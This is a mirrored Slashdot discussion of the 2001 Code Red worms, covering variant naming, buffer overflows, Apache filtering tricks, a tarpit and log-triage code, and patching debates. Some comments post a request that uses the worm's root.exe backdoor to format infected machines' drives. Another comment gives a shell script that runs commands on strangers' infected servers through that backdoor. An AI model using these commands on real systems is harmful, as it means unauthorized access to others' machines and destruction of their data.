Slashdot Mirror


Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

37 of 759 comments

  1. Re:Bah. by austad · · Score: 5, Insightful

    How about an apache box in front of the IIS server with mod_proxy installed and set up as a reverse proxy filtering out default.ida requests?

    --
    Need Free Juniper/NetScreen Support? JuniperForum
  2. Versions of the worm... by Moonshadow · · Score: 5, Funny

    Code Red: A New Worm
    Code Red: Microsoft Strikes Back
    Code Red: Return of the Virii
    Code Red: The Not-so Phantom Menace

    And finally...

    Code Red: Attack of the Clones

  3. I want Code Red IV myself... by QwkHyenA · · Score: 4, Funny
    Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

    --
    LFS. Have you built your system today?
  4. More information? by Dr.+Evil · · Score: 5, Interesting

    I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

    The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In other words, they're only figuring out now how bad Code Red II is.

    1. Re:More information? by ncc74656 · · Score: 5, Informative
      Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

      Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

      That's probably a little further than the law will allow...but you could throw up a popup on infected systems. That'll let the admins on the other end know they have a problem. You can even include some simple help.

      I threw together a script a few nights ago that sends such a popup to every CodeRed2-infected server that's contacted my server. It's available at http://salfter.dyndns.org/codered.shtml if anyone's interested. I also have live log info available there...got only about two dozen hits from the original CodeRed, but CodeRed2 is at 3500 hits and climbing.

      Since the list is fairly lengthy at this point, let's see if I can sneak the script past the lameness filter:

      #!/bin/sh
      # Pull the source hosts of CodeRed2 hits out of the web-log database
      # (the "apache2" database and its transfer/host tables are the poster's
      # own log schema), ping each one, and use the worm's own root.exe backdoor
      # to pop a "net send" message on the infected box.
      http_proxy=
      for i in $( (echo 'use apache2' ; echo 'select host.host from transfer inner join host on host.id=transfer.hostid where requestid=2058 and transfer.time>"2001-07-31";') | mysql | sort | uniq | grep -v '^host$' )
      do
        echo -n "Sending Code Red message to $i..."
        # one ping with a 3-second deadline; "100% packet loss" means unreachable
        result=$(ping -c 1 -w 3 "$i" | grep "100% packet loss")
        if [ -n "$result" ]
        then
          echo "host is down."
        else
          # the query string is passed to cmd.exe via the backdoor; quoting the
          # URL means ? and ( ) no longer need backslash escapes
          lynx -dump "http://$i/scripts/root.exe?/c+net+send+localhost+%22Your+web+server+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location).%22" >/dev/null
          echo "message sent."
        fi
      done

      Damn...looks like the lameness filter didn't throttle it, but some extra spaces got thrown in. The spaces that need to be removed are fairly obvious, though.

      --
      20 January 2017: the End of an Error.
    2. Re:More information? by blakestah · · Score: 5, Funny

      In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.


      What they are calling CodeRed III is really CodeRedII with a better IP selection routine.
      Still has the XXX and installs the backdoor

      Now incidents.org is recommending that the compromised machines, which have installed backdoors, format their c drive and reinstall

      We can do it for them...

      GET /script/root.exe?+%2fc+format+c:

    3. Re:More information? by pi_rules · · Score: 4, Informative

      There were/are three versions actually. Incarnations 1 and 2 had the same purpose though. CRv1a (I think that's the accepted name) had a rather dumb random number generator. CRv1b had a much more targeted random number generator. CRv1a and CRv1b were very close in code though. The code for v1b was in v1a, but wasn't activated. The author had it just jump over the not-yet-wanted portions. You can spot a CRv1 attempt because it uses N's to fill up the buffer.

      CRv2 on the other hand (which is technically the 3rd release, but the first two did almost the same thing) fills up the buffer using X's and then opens the backdoor, sets up root.exe in the scripts/ mapping, etc. Totally different codebase from what I gather.

      In all likelihood the media is confused. It wouldn't be the first time. I figure if there's a CRv3 ever out there it won't be near as nice as v2 is. I'm thinking massive damage upon infection to the machine... but not enough to keep the worm from spreading.

      Justin Buist

    4. Re:More information? by ryanr · · Score: 4, Funny

      The name Code Red came from Marc and Ryan at eEye. When the version of the original Code Red with the "improved" random number generator came out, they named the new variant CRv2, and re-named the first one CRv1. When we found the one that leaves the back doors, inside is the string "CodeRedII", which is used as an atom name. The author named that one himself.

      Other people keep referring to CodeRed III, or CodeRed3. I *think* they are all talking about CodeRed II. We have yet to verify any fourth version.

      For people who are asking in other threads here, CRv1 and CRv2 use NNNNNNNN's in their URL. CodeRed II uses XXXXXXXXXX's.

      Honestly, if we can keep PacMan, Ms. PacMan, PacMan Jr., PacLand, and SuperPacMan distinct, why not the Code Red names?

      In any case, if someone is able to translate this link, that would be a huge help.

    5. Re:More information? by BigBlockMopar · · Score: 4, Funny

      We can do it for them...
      GET /script/root.exe?+%2fc+format+c:

      Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

      Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

      --
      Fire and Meat. Yummy.
  5. Re:An ETHICAL way to Anti-Virus by nitehorse · · Score: 5, Informative

    Actually, if you add a line in your httpd.conf that looks like this:

    AddHandler cgi-script .ida

    then you can use Perl to write a quick script which will do the reverse lookup and then send that email. Or, if you want to use PHP instead, alter your AddType line for PHP to this:

    AddType application/x-httpd-php .php .php3 .ida

    Then restart apache, and throw a script named default.ida up to your DocumentRoot directory.

    -Chris

  6. Stop addressing Code Red by I_redwolf · · Score: 4, Insightful

    and start addressing the primary issue at hand. The issue is system administrators need to take proactive measures to make sure their systems have been patched. That's the problem and that's what needs to be addressed. There is nothing significantly fascinating about this program that deserves any notoriety. It didn't find some weird flaw in design. It just exploits a buffer overflow which has always been a problem in people's code. It's a really simple thing to fix at that. Enough about Code Red and more about the underlying problem.

  7. The Code Red hype Hall of Shame by wiredog · · Score: 5, Informative
  8. So hard to keep up by snakecoder · · Score: 5, Funny

    God, I'm still on version 1 of code red. Does anybody know where I can download the latest version? Is there a mail list I can get on so I know I have the latest version on my IIS server?
    Tnks.

    --
    -Nuke the moon
  9. Re:Copycats by Syberghost · · Score: 5, Insightful

    Get over it. Code Red is dead.

    The folks here at the Fortune 500 company I work for who have been working around the clock since Wednesday trying to clean up this mess will be real happy to hear that you don't believe it exists.

  10. Use Open Source to Fight Code Red by isn't+my+name · · Score: 4, Interesting

    Tom Liston came up with a cool idea for slowing Code Red and other TCP port scanners. He didn't have the bandwidth to host it, and I offered. So, this is a shameless plug, but if we can get enough of us doing this and get some press coverage, it's a great story that shows the power and speed with which open source solutions can be implemented. He first posted the idea on 7/31 just before Code Red started heating up again. Using the Trinux (http://www.thrinux.org) linux distribution, he cobbled together a floppy boot image that, with unused ip addresses and an old machine, can be used to slow the scans by responding to the initial TCP three way handshake and then ignoring everything else. The automated scanner has to time out before that thread can move on. According to reports on the SANS Intrusions discussion list, it seems to slow all variants of Code Red and RPC scans as well. His announcement of LaBrea is at: http://www.incidents.org/archives/intrusions/msg01368.html
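The mechanism described above, reduced to the smallest thing that still exhibits it, as an added example (this is not LaBrea's code, nor anything posted in the thread). LaBrea answers SYNs for unused addresses with crafted SYN/ACKs; here the kernel completes the three-way handshake for a real listening socket and the server then simply never reads or replies, so a scanner that does a blocking send/recv per target sits there until its own timeout fires. The loopback address, the port (chosen by the OS) and the Code Red style request are assumptions for the demonstration:

```python
"""A tiny accept-and-ignore tarpit, in the spirit of LaBrea (added example)."""
import socket
import threading
import time


class Tarpit:
    """Listen on a port, let the kernel finish the three-way handshake,
    then hold every accepted connection open without reading or replying."""

    def __init__(self, host="127.0.0.1", port=0):     # port 0: let the OS pick
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind((host, port))
        self._srv.listen(128)
        self._srv.settimeout(0.2)          # lets the accept loop notice stop()
        self.host, self.port = self._srv.getsockname()[:2]
        self._held = []                    # accepted sockets we deliberately ignore
        self._lock = threading.Lock()
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, _ = self._srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            # Never read, never write: the peer's send lands in our receive
            # buffer and its recv blocks until the peer's own timeout fires.
            with self._lock:
                self._held.append(conn)

    def held(self):
        """Number of connections currently stuck in the pit."""
        with self._lock:
            return len(self._held)

    def stop(self):
        self._stop.set()
        self._thread.join()
        with self._lock:
            for conn in self._held:
                conn.close()
            self._held.clear()
        self._srv.close()


def probe(host, port, timeout=0.5):
    """Behave like one scanner thread: connect, send a Code Red style request
    (constructed), wait for a reply. Returns (seconds stuck, bytes received or None)."""
    request = b"GET /default.ida?" + b"X" * 224 + b" HTTP/1.0\r\n\r\n"
    started = time.monotonic()
    data = None
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            s.sendall(request)             # succeeds: the handshake is done
            data = s.recv(1024)            # nothing ever comes back
        except socket.timeout:
            pass
    return time.monotonic() - started, data


if __name__ == "__main__":
    pit = Tarpit().start()
    stuck, data = probe(pit.host, pit.port, timeout=2.0)
    print(f"scanner stuck for {stuck:.1f}s, received {data!r}; "
          f"tarpit holding {pit.held()} connection(s)")
    pit.stop()
```

The design point is that the cost is asymmetric: the tarpit spends one file descriptor per victim connection and no CPU, while the scanner loses a full timeout per probe. The real LaBrea goes further by never allocating a socket at all and by shrinking the TCP window to keep the peer's retransmissions going, which is why it can cover whole unused address ranges from one old machine.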

  11. As with the parent, so with the child. by pmorrison · · Score: 5, Funny

    It usually takes Microsoft 3 releases to get it right. So, when can we expect Code Red .Net?

  12. Saddens me though by Hammer · · Score: 5, Funny

    That Linux and Apache are not compatible.
    We seem to have a good ways to go before everything that runs on Winblows will also run on Linux :-))

  13. It's not like they haven't announced the patch by mblase · · Score: 5, Insightful
    Remember the recent Ford Explorer/Firestone fiasco? Firestone made a bunch of flawed tires (when and where is not important here) that were put on these Explorer SUVs, which in some cases fell apart and came off the wheel when driving at high speeds. Investigations were made, and eventually Firestone had to issue a complete recall of the tires.

    The media talked about it for weeks. Ford sent out letters to customers as far as they could find them. People brought their SUVs in, got new tires put on them, drove out. That's how product recalls usually go.

    Software patches aren't all that different. When a hole is discovered, a patch is made. Responsible Microsoft server administrators have the MS site automatically checked on a daily basis for critical updates and patches. Irresponsible admins don't bother, and they become vulnerable and the cause of the worm's spread.

    But it would be insane to propose MS should force-feed this server patch to all their customers. The problem isn't the software, it's the admins. You'd be hard-pressed to find a major newspaper in the civilized world that hasn't mentioned this worm yet, and still there are people who don't bother to patch. They're the same ones who think that server software is just like desktop software, where you're the only one who uses it that really matters.

    Firestone couldn't make its customers bring their SUVs in to have the tires replaced for free, and there's no way the customers could claim ignorance of the problem after the press got done with it. Likewise, Microsoft can't make its customers upgrade their software for free. They've honestly tried to make all their server customers aware of what's expected of them, but they're as powerless to force it to happen as Firestone is to force car drivers to rotate their tires every 6,000 miles.

  14. Version 3? Don't think so. by Todd+Knarr · · Score: 5, Insightful

    My suspicion is this is Code Red 2. One of the AV companies used "CodeRed.v3" or something similar to refer to Code Red 2, and I'd bet the journalists were just too clueless to figure out that the two names refer to the same thing.

  15. Obviously, IIS is *vastly* more popular than apache by Jerf · · Score: 4, Insightful
    They quote a columnist for Microsoft's TechNET who makes the false claim that IIS is more popular than apache, and attributes the widespread exploits to that (false) popularity!

    More popular with whom? If there's anything these worms have shown us, it's that there's a HELL of a lot more IIS installations than anybody would really have guessed, due to the ease of installing it without even realizing it with Windows 2000.

    IIS and Apache may be roughly comparable for "real" websites, but in terms of sheer number of installations, I'd now bet that IIS is creaming apache.

    Before you get too huffy, note this is a bad thing, as it has provided a fertile breeding ground for these worms, while providing little-to-no benefit in return.

    "More lusers with vulnerable web servers than ever before - Microsoft Windows 2000."

  16. An ETHICAL way to Anti-Virus by Slur · · Score: 5, Interesting

    Hi,

    I've been watching my Apache log as I get hit about every 10 minutes by Code Red. For each source IP address I've been doing a reverse lookup and if successful then notifying the webmaster of the source domain about the infected computer on their network.

    I'd like to automate this process and generate a "form" email, filling in the relevant details, but I'm not sure how to cause a script to be invoked by a change in the Apache log, except to maybe run a 5 minute cron job that grabs all the Code Red attacks and then renames the log file.

    An example of the email I've been sending is this:

    Hi,

    Just a note to let you know that a copy of the Code Red virus is on your network attacking my web server. The source IP address is: 207.151.xxx.xxx which a reverse lookup shows as xxx.xxx.gdsl.nwc.net . If this is a customer on your network then please pass on to that individual that they need to reboot their NT/W2K server and possibly reinstall their OS. They will also need to get a patch from Microsoft to correct this vulnerability.


    This is probably a very minuscule thing to do, but it does - in a way - inoculate against the virus, at least on consumer DSL networks, and in a manner that is both ethical and - like a virus - fairly contagious. I've heard a lot of buzz in places like Slashdot about making an "anti-virus" but why haven't I heard this kind of thing suggested before?

    --
    -- thinkyhead software and media
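An added example of the automation Slur is asking for, combined with the variant rule ryanr gives above (CRv1/CRv2 pad the .ida query with N's, CodeRedII with X's). This is not code from the thread or from any of the posters: it parses Apache common/combined log lines (the sample lines are constructed), classifies each default.ida hit by its padding byte, counts hits per source IP, does an optional reverse lookup, and fills in a notice along the lines of Slur's e-mail. It goes a little beyond the post in that a default.ida request without the worm's padding is reported separately rather than counted as Code Red. Sending the mail and the cron wiring are left to the reader; the `resolver` parameter exists so the lookup can be stubbed offline.

```python
"""Triage Code Red probes found in an Apache access log (added example)."""
import re
import socket
from collections import Counter

# Apache common/combined log line; only the fields the triage needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# ryanr's rule from the thread: CRv1/CRv2 pad the query with N, CodeRedII with X.
# Require a long run so a stray leading N or X in an ordinary query does not match.
FILLER_RE = re.compile(r"^([NX])\1{99,}")
VARIANT_BY_FILLER = {"N": "CRv1/CRv2", "X": "CodeRedII"}


def classify_request(path):
    """Return the Code Red variant a request path looks like, or None.

    'unknown-ida' covers a default.ida hit whose padding is not the worm's.
    """
    if "?" not in path:
        return None
    resource, query = path.split("?", 1)
    if not resource.lower().endswith("/default.ida"):
        return None
    m = FILLER_RE.match(query)
    if m is None:
        return "unknown-ida"
    return VARIANT_BY_FILLER[m.group(1)]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage(log_text):
    """Map each probing source IP to (variant, hit count)."""
    hits = Counter()
    variant = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        v = classify_request(rec["path"])
        if v is None:
            continue
        hits[rec["ip"]] += 1
        variant[rec["ip"]] = v
    return {ip: (variant[ip], n) for ip, n in hits.items()}


def reverse_lookup(ip, resolver=socket.gethostbyaddr):
    """PTR lookup; None when there is no record. `resolver` is injectable
    (hypothetical parameter) so the lookup can be stubbed offline."""
    try:
        return resolver(ip)[0]
    except OSError:          # socket.herror / gaierror are OSError subclasses
        return None


def draft_notice(ip, variant, hostname=None):
    """The form e-mail Slur describes, with the details filled in."""
    who = f"{ip} ({hostname})" if hostname else ip
    return (
        f"A copy of the Code Red worm ({variant}) on your network is attacking "
        f"my web server. Source: {who}. If this is a customer on your network, "
        "please let them know the server needs Microsoft's IIS patch for the "
        ".ida vulnerability and, for CodeRedII, a check for root.exe in the "
        "scripts directory and a rebuild if the backdoor was used."
    )


# Constructed sample log: two CodeRedII probes from one host, one CRv1/CRv2
# probe, a normal page hit, and a default.ida request that is not the worm.
SAMPLE_LOG = "\n".join([
    f'10.0.0.5 - - [04/Aug/2001:12:00:01 -0400] "GET /default.ida?{"X" * 224}%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 299',
    '198.51.100.9 - - [04/Aug/2001:12:00:02 -0400] "GET /index.html HTTP/1.1" 200 1043',
    f'192.0.2.77 - - [04/Aug/2001:12:00:03 -0400] "GET /default.ida?{"N" * 224}%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 299',
    f'10.0.0.5 - - [04/Aug/2001:12:03:41 -0400] "GET /default.ida?{"X" * 224}%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 299',
    '203.0.113.4 - - [04/Aug/2001:12:05:00 -0400] "GET /default.ida?foo=bar HTTP/1.1" 404 299',
])

if __name__ == "__main__":
    for ip, (variant, n) in sorted(triage(SAMPLE_LOG).items()):
        print(f"{ip:15} {variant:10} {n} hit(s)")
        print("  " + draft_notice(ip, variant, reverse_lookup(ip)))
```

Run it against a real log by replacing `SAMPLE_LOG` with the file contents; a five-minute cron job over the current log, as Slur suggests, only needs to remember which IPs it has already notified. Dedupe before mailing: the CodeRedII host above probed twice in a few minutes and would otherwise get two notices.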
  17. Serious blow to open source & free software by Sloppy · · Score: 5, Funny

    Here we have something that does not come with source code, but people are still able to maintain the program, improve its performance, and then get those improvements quickly out into the field. Even Linux updates don't get distributed this efficiently.

    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  18. I saw that Reuters story earlier by GC · · Score: 4, Interesting

    but I have not seen any instances of attempted infection.

    It's all very vague and the chances of mistaking Code Red rev C as Code Red III, (rev C = version II) are simply too high.

    I also assume that this takes advantage of the same Index Vulnerability in IIS, which if anyone has been hit by either of the first two versions then they will have minimised the risks of a new version which uses the same vulnerability.

  19. make some money off banner ads by SethJohnson · · Score: 5, Insightful


    Taco, I recommend you sign up with one of those online casino sites and host banner ads on your server with the file name of /default.ida. You should be able to rack up a few thousand unique page views a day by pointing the scourge at the scourge (ala Fist Full of Dollars).
  20. Public Logfile - for *Educational* Purposes Only by BigBlockMopar · · Score: 5, Informative

    I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log
    should we set up a site somewhere of ip addrs?

    Already got one! Remember, the list, including fully-qualified hostnames, is for _educational_ purposes only. I've made it available so that we can study how this thing moves, not for such purposes as mass-spamming postmaster@$IIS-INFECTED-HOSTNAME with flames reminding him that he is a blithering idiot, nor for other untoward activities which may be performed on a machine with a shell in a webserver's public directory.

    --
    Fire and Meat. Yummy.
  21. Re:Please by truthsearch · · Score: 4, Flamebait

    If Microsoft can't even patch their own servers then how can anyone expect others to do it properly? The best solution (in the long run), is to switch to a server which has fewer vulnerabilities.

  22. Microsoft should be sued by Rosco+P.+Coltrane · · Score: 4, Flamebait
    Why do poor bastards get sued for using a little bandwidth to participate in an interesting project while Microsoft gets away with releasing shoddy products that slow down the entire Internet ?

    I know gun manufacturers shouldn't be sued when someone commits a crime with a firearm, and in that case the people who created the lame Code Red virii should be sued primarily, but I still think Microsoft is guilty here because their customers weren't aware their Windows-running boxes could start chewing up bandwidth like crazy simply because the OS vendor doesn't give a damn about these things.

    To my knowledge, Microsoft didn't even try to mass-mail the patch to their registered customers who might be affected. Therefore, at the very least, I reckon they should be ordered to pay damages to telcos and ISPs for lack of due diligence.

    (of course, in Georgia, I'd also be happy to see the state sue them for 59c per second of wasted bandwidth as well :-)

    --
    "A door is what a dog is perpetually on the wrong side of" - Ogden Nash
    1. Re:Microsoft should be sued by Keith+Russell · · Score: 5, Insightful
      ...most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software.
      IIS doesn't even run on 9x, ME, or other spawn of 3.x. 2000 Professional* does not install IIS by default. Your Joe Schmoe must have either installed IIS after installing W2kPro, or installed W2k Server, which does install IIS automatically. Either way, he took deliberate action to make his PC a server, and with it, took on the responsibility of keeping that server up-to-date.

      Claiming that Microsoft should be liable for sysadmins who are some combination of naive, out of touch, unqualified, or just plain stupid is like claiming that I can sue Honda because my parked car was sideswiped by an unlicensed, drunk driver who just happened to be in an Accord.

      *: This also applies to NT 4.0.
      --
      This sig intentionally left blank.
    2. Re:Microsoft should be sued by blang · · Score: 5, Insightful

      Because we're not talking about admins, but gullible users. When I did a quick tour of the hacked sites in my apache log, most of the sites were Joe Schmoe's cable modem surfmachines with nothing on. Their only crime was to purchase the damned software. Nobody ever told them that the software is considered harmful, and needs constant babysitting. Sounds like a good enough reason for a class action lawsuit to me.

      --
      -- Another senseless waste of fine bytes.
  23. Finally by nEoN+nOoDlE · · Score: 5, Funny

    Sequels that are actually better than the original.

    --
    Don't trust a bull's horn, a doberman's tooth, a runaway horse or me.
  24. If the log hits aren't for you, do the right thing by Darby · · Score: 4, Funny

    and see that they go where they belong. I mean seriously, I've seen lots of sites with a domain name which I thought was some other much more popular site which had a small link at the bottom saying something to the effect of: If you're looking for such and such they're actually located here.
    It's just common courtesy provided it isn't a competitors site.

    So what you do is set up a script to pull each individual Code Red transaction out of your logs and send an email to support@microsoft.com with a message similar to the following:

    A user at IP address x.x.x.x was trying to contact you and got my IP address by mistake. I know how important the needs and desires of your customers are to Microsoft, so I was certain you would want to know about this as soon as possible.

  25. Re:Help me out on this one... by DeadMeat+(TM) · · Score: 5, Informative
    Code Red takes advantage of what's called a "buffer overflow" in Microsoft's IIS web server software.

    What happens is that IIS sits there, waiting for Web browsers to request pages. A Code Red infected server starts randomly picking other computers on the Internet or the network, and requests them to send a Web page called default.ida. It then passes a huge parameter to default.ida.

    Apparently, default.ida has hard-coded a maximum length for parameters -- say, 200 letters. (Probably not actually 200 -- but you get the idea.) That's why all the XXX and NNN's are there -- it's the 200 (etc.) letters that's the most default.ida is expecting to receive. A buffer overflow is when something goes past that maximum number of letters, and a program with a buffer overflow problem usually does something strange with the information past that point -- in this case, default.ida takes everything after that number of letters and runs it as if it were a program.

    Normally, this would just crash IIS (since it's getting a bunch of garbage, and running garbage makes programs crash) but Code Red is purposely designed so after the right number (200 or whatever) of XXX/NNN's, it tacks on the code to infect the computer with Code Red. So, IIS runs the code, the computer becomes infected with Code Red, it starts trying to spread it to other computers, and the whole cycle starts all over again.

  26. Re:Bah. by mjh · · Score: 4, Informative
    I've got entire projects sitting dead in the water because one server relies on one piece of third-party software that can't operate with Service Pack 6a, and so can't be brought up until they find a solution.

    You might be interested in this article titled, "Securing an unpatchable webserver"

    --
    Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
  27. More info on Code Red III by Sideways+The+Dog · · Score: 4, Funny
    WARNING, VIRUS ALERT!!!

    If you see a message on the boards with a subject line of "Hi, how are you," delete it immediately WITHOUT reading it. It is "Code Red III". This is the most dangerous virus yet. It will re-write your hard drive. Not only that, but it will scramble any disks that are even close to your computer (up to 20 feet). It will recalibrate your refrigerator's coolness setting so all your ice cream melts and milk curdles. It will demagnetize the strips on all your credit cards, reprogram your ATM access code, screw up the tracking on your VCR and use subspace field harmonics to scratch any CDs you try to play.

    It will give your ex-boy/girlfriend your new phone number. It will program your phone autodial to call only your mother's number. It is insidious and subtle. It is dangerous and terrifying to behold. It will mix antifreeze into your fish tank. It will drink all your beer. It will hide your car keys when you are late for work and interfere with your car radio so that you hear 1940's hits and static while stuck in traffic.

    It will give you nightmares about circus midgets. It will replace your shampoo with Nair and your Nair with Rogaine, all while dating your current boy/girlfriend behind your back and billing their hotel rendezvous to your Visa card. It will seduce your grandmother. It does not matter if she is dead, such is the power of "Code Red III", it reaches out beyond the grave to sully those things we hold most dear.

    It will rewrite your back-up files, changing all your active verbs to passive tense and incorporating undetectable misspellings which grossly change the interpretation of key sentences.

    "Code Red III" will give you Dutch Elm disease. It will leave the toilet seat up and leave the hairdryer plugged in dangerously close to a full bathtub. It will wantonly remove the forbidden tags from your mattresses and pillows, and refill your skim milk with whole. "Code Red III" is an evil virus conceived by evil people. It is also a rather interesting shade of mauve. These are just a few signs. Be very, very afraid. PLEASE FORWARD THIS MESSAGE TO EVERYONE YOU KNOW!!!

    --
    "Love is never saying you're too proud." -Tonic
  28. Put it in another log and forget about it. by Malc · · Score: 4, Interesting
    "I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer. "

    I'm not even sure how to spell regexe, but this is what I've attempted to do:

    SetEnvIf Request_URI /(.*default.ida.*$) code-red-request
    CustomLog /var/log/apache/code-red-request.log common env=code-red-request
    #CustomLog /var/log/apache/access.log common
    CustomLog /var/log/apache/access.log common env=!code-red-request

    RedirectMatch Permanent /(.*default.ida.*$) http://127.0.0.1/$1
  29. Interesting Irony by Naerbnic · · Score: 5, Funny

    So, Three Code Reds and a SirCam later, the question just begs to be asked:

    Who's calling Whose code "Potentially Viral"?

    --


    So there I was, juggling apples and small animals, when I accidentally bit into the wrong one...
  30. I think you're on to something... by Nate+Fox · · Score: 5, Informative

    According to Symantec's page on CR2:

    Also Known As: CodeRed.v3, CodeRed.C, CodeRed III, W32.Bady.C